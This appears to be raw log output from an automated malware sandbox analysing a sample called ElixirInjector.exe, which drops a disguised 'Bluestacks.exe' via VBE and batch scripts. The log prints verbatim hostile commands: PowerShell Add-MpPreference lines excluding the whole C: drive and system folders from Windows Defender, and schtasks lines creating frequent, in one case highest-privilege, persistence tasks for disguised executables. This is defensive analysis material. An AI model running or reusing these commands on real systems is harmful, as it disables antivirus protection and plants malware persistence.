Source: C:\Users\user\Desktop\ElixirInjector.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Source: Bluestacks.exe, 00000005.00000002.2686434949.000000001BA8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: ElixirInjector.exe, 00000000.00000002.2186912266.0000000009690000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: Bluestacks.exe, 00000005.00000002.2686434949.000000001B9D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\ElixirInjector.exe

API call chain: ExitProcess graph end node

graph_0-24984

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F2F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F2F838

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F37DEE mov eax, dword ptr fs:[00000030h]

0_2_00F37DEE

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F3C030 GetProcessHeap,

0_2_00F3C030

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	Process token adjusted: Debug
Source: C:\Windows\ShellComponents\cmd.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Process token adjusted: Debug
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Process token adjusted: Debug
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F2F838
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2F9D5 SetUnhandledExceptionFilter,	0_2_00F2F9D5
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F2FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F2FBCA
Source: C:\Users\user\Desktop\ElixirInjector.exe	Code function: 0_2_00F38EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F38EBD

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellComponents\cmd.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe'
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'	Jump to behavior

Source: C:\Users\user\Desktop\ElixirInjector.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\6iq5IFzZA9EyHTwKHM8vXk9USXtHecApoG.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe "C:\Users\user\AppData\Local\Temp\WinRAR/data/bin/unistall/Bluestacks.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fvXBwqYdGYPkplbuTcoXecCdPf" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9w1FkSj5b9.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe "C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe"

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F2F654 cpuid

0_2_00F2F654

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00F2AF0F

Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe VolumeInformation	Jump to behavior
Source: C:\Windows\ShellComponents\cmd.exe	Queries volume information: C:\Windows\ShellComponents\cmd.exe VolumeInformation
Source: C:\Windows\ShellComponents\cmd.exe	Queries volume information: C:\Windows\ShellComponents\cmd.exe VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
